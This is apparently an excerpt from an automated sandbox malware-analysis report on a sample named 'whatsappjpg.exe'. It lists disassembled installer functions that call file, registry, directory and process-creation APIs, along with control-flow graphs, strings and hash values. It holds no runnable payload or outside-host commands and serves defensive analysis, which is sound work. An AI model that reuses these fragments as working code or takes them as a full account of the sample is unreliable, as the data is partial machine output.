                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll
                                                      • API String ID: 2531174081-3000552427
                                                      • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                      • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                      • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                      • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 817 40317b-4031a4 GetTickCount 818 4032e5-4032ed call 402d18 817->818 819 4031aa-4031d5 call 40330d SetFilePointer 817->819 824 4032ef-4032f4 818->824 825 4031da-4031ec 819->825 826 4031f0-4031fe call 4032f7 825->826 827 4031ee 825->827 830 403204-403210 826->830 831 4032d7-4032da 826->831 827->826 832 403216-40321c 830->832 831->824 833 403247-403263 call 40638e 832->833 834 40321e-403224 832->834 840 4032e0 833->840 841 403265-40326d 833->841 834->833 835 403226-403246 call 402d18 834->835 835->833 842 4032e2-4032e3 840->842 843 4032a1-4032a7 841->843 844 40326f-403285 WriteFile 841->844 842->824 843->840 845 4032a9-4032ab 843->845 846 403287-40328b 844->846 847 4032dc-4032de 844->847 845->840 849 4032ad-4032c0 845->849 846->847 848 40328d-403299 846->848 847->842 848->832 850 40329f 848->850 849->825 851 4032c6-4032d5 SetFilePointer 849->851 850->849 851->818
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403190
                                                        • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                      • WriteFile.KERNELBASE(0040BE78,0040F2DB,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                      • SetFilePointer.KERNELBASE(00006E9F,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID: x>A
                                                      • API String ID: 2146148272-3854404225
                                                      • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                      • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                      • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                      • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 852 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 859 4029c5-4029d4 852->859 860 40237b-402383 852->860 862 402385-402392 call 402b38 lstrlenW 860->862 863 402396-402399 860->863 862->863 864 4023a9-4023ac 863->864 865 40239b-4023a8 call 402b1b 863->865 869 4023bd-4023d1 RegSetValueExW 864->869 870 4023ae-4023b8 call 403060 864->870 865->864 874 4023d3 869->874 875 4023d6-4024b0 RegCloseKey 869->875 870->869 874->875 875->859 877 402791-402798 875->877 877->859
                                                      APIs
                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp
                                                      • API String ID: 1356686001-491460166
                                                      • Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                      • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                      • Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                      • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 878 4015b9-4015cd call 402b38 call 4059de 883 401614-401617 878->883 884 4015cf-4015eb call 405960 CreateDirectoryW 878->884 885 401646-402195 call 401423 883->885 886 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 883->886 892 40160a-401612 884->892 893 4015ed-4015f8 GetLastError 884->893 899 4029c5-4029d4 885->899 886->899 902 40163e-401641 886->902 892->883 892->884 896 401607 893->896 897 4015fa-401605 GetFileAttributesW 893->897 896->892 897->892 897->896 902->899
                                                      APIs
                                                        • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004059EC
                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens,?,00000000,000000F0), ref: 00401630
                                                      Strings
                                                      • C:\Users\user\Uploadable\normallnnens, xrefs: 00401623
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID: C:\Users\user\Uploadable\normallnnens
                                                      • API String ID: 3751793516-3974840194
                                                      • Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                      • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                      • Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                      • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 904 10001771-100017ad call 10001b3e 908 100017b3-100017b7 904->908 909 100018be-100018c0 904->909 910 100017c0-100017cd call 100022eb 908->910 911 100017b9-100017bf call 100022a1 908->911 916 100017fd-10001804 910->916 917 100017cf-100017d4 910->917 911->910 918 10001824-10001828 916->918 919 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 916->919 920 100017d6-100017d7 917->920 921 100017ef-100017f2 917->921 922 10001866-1000186c call 1000248d 918->922 923 1000182a-10001864 call 100015cc call 1000248d 918->923 944 1000186d-10001871 919->944 926 100017d9-100017da 920->926 927 100017df-100017e0 call 10002870 920->927 921->916 924 100017f4-100017f5 call 10002b2b 921->924 922->944 923->944 937 100017fa 924->937 932 100017e7-100017ed call 10002614 926->932 933 100017dc-100017dd 926->933 940 100017e5 927->940 943 100017fc 932->943 933->916 933->927 937->943 940->937 943->916 947 10001873-10001881 call 10002450 944->947 948 100018ae-100018b5 944->948 954 10001883-10001886 947->954 955 10001899-100018a0 947->955 948->909 950 100018b7-100018b8 GlobalFree 948->950 950->909 954->955 957 10001888-10001890 954->957 955->948 956 100018a2-100018ad call 10001555 955->956 956->948 957->955 959 10001892-10001893 FreeLibrary 957->959 959->955
                                                      APIs
                                                        • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                        • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                        • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                      • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                      • FreeLibrary.KERNEL32(?), ref: 10001893
                                                      • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                        • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3
                                                        • Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686
                                                        • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                        • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                        • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
                                                        • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                      • String ID:
                                                      • API String ID: 1767494692-3916222277
                                                      • Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                      • Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
                                                      • Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                      • Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 961 403060-40306e 962 403070-403086 SetFilePointer 961->962 963 40308c-403095 call 40317b 961->963 962->963 966 403175-403178 963->966 967 40309b-4030ae call 405bd7 963->967 970 403161 967->970 971 4030b4-4030c8 call 40317b 967->971 973 403163-403164 970->973 971->966 975 4030ce-4030d1 971->975 973->966 976 4030d3-4030d6 975->976 977 40313d-403143 975->977 980 403172 976->980 981 4030dc 976->981 978 403145 977->978 979 403148-40315f ReadFile 977->979 978->979 979->970 982 403166-40316f 979->982 980->966 983 4030e1-4030eb 981->983 982->980 984 4030f2-403104 call 405bd7 983->984 985 4030ed 983->985 984->970 988 403106-40311b WriteFile 984->988 985->984 989 403139-40313b 988->989 990 40311d-403120 988->990 989->973 990->989 991 403122-403135 990->991 991->983 992 403137 991->992 992->980
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                      • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID: x>A
                                                      • API String ID: 539440098-3854404225
                                                      • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                      • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                      • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                      • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 993 405db5-405de7 RegOpenKeyExW 994 405e29-405e2c 993->994 995 405de9-405e08 RegQueryValueExW 993->995 996 405e16 995->996 997 405e0a-405e0e 995->997 998 405e19-405e23 RegCloseKey 996->998 997->998 999 405e10-405e14 997->999 998->994 999->996 999->998
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
                                                      • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3677997916-1824292864
                                                      • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                      • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                                                      • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                      • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405BA1
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-2113348990
                                                      • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                      • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                      • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                      • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                      APIs
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                        • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                        • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                      • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                      • Opcode Fuzzy Hash: 329a89c6d9ef03e77f353351c122dd9280af34df733643d0fd88adbc7d5fde3b
                                                      • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                      • CloseHandle.KERNEL32(?), ref: 00405695
                                                      Strings
                                                      • Error launching installer, xrefs: 00405676
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                      • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                      • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                      • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                      APIs
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
